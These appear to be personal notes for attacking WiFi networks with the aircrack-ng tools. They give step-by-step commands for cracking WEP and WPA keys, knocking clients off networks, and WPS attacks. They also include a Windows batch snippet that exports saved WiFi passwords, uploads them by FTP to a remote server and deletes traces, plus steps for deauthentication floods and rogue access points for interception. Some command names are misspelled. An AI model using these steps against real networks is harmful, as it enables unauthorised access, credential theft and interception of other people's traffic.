- kali linux distribution
- external alpha card and antenna
airmoin-ng
shows the available interface
airmon-ng start wlan0
enabled monitor mode and list all processes that may cause trouble. That may be e.g. dhclient (DHCP client), the Network Manager or wpa_suppicant.
kill 2222
so we just kill that processes, repeat if there are more.
airodump ng wlan0
now the available APs are shown with some properties.
copy the BSSID (MacAddress) of the target AP wiht WEP as CIPHER.
airodump-ng -c 10 -w dumpfile -bssid ${mac} mon0
now it is lisening for data. wait for #Data to be high
beware, this is not to be used on foreign networks it can alert ids
airplay-ng -1 0 -a ${mac} mon0
ask for authentication
airplay-ng -1 1 -a ${mac} mon0
cause traffic, check if data goes up or channel is wrong if it is wrong, cancel and restart
airplay-ng -3 -b ${mac} mon0
wait for arp request
aircrack-ng dumpfile-0.cap
tries to crack if it fails try next cap file
if succeeded, key is found
for WPA you need to enforce auth by a client
you will need a very good dictionary to crack the key
airmon-ng start wlan0
airodump-ng wlan0
copy the mac address desired and memorize the channel
new terminal
airodump-ng -c $chan --bssid $mac -w ~/Desktop/dumpfile
dump the data, here handshakes are needed not just data you also see some more macs of connected stations that we soon need
stop scanning instances if still running
airoplay-ng -0 -2 -a $ap-mac -c $client-mac mon0
repeat until it runds on the correct channel
this then deauthenticated the client and captures the handshake in the other instance
after collecting some handshakes you might start the crack
aircrack-ng -a 2 -b $ap-mac -w wordlistfile ~/Desktop/*.cap
an alternative to wordlists is wps reaver can obtain the password there
newer versions of wps are not vulnerable any more
in case wifi is secured properly you might attack a client e.g. windows is a good thing to find the passphrases in
mkdir c:\temp
netsh wlan export profile folder=c:\temp
#netsh wlan add profile filename="theXMLexport.xml"
note that events on windows are logged by eventmanager!
::just to copy the file to a remote machine
@ftp -i -s:"%~f0"&GOTO:EOF
open server.net
my_username
my_password
!:---FTP commands following here---
cd location/for/storage
put c:\Temp\*.xml
disconnect
quit
::now delete traces
this is a snippet for connecting to ftp
netsh
$ add profile filename="theXMLexport.xml" user=all
$ wlan show profiles
then open network settings for wifi there you can show the key
copy the mac
airodump-ng -c $channel --bssid $ap-mac
now again you see the clients connected to the ap listed below this can be accomplished with the first instance using hotkeys a for switching views and s for sorting try finding an active client where DOS has a point
aireplay-ng --deauth 1000 -a $ap-mac -c $client-mac mon0
this causes the client to loose connection and probably reconnect manually
now you can put a rogue ap that the client wants to connect to then after that yu have the possibility to be MITM of this clients connections as long as its not e2e encrypted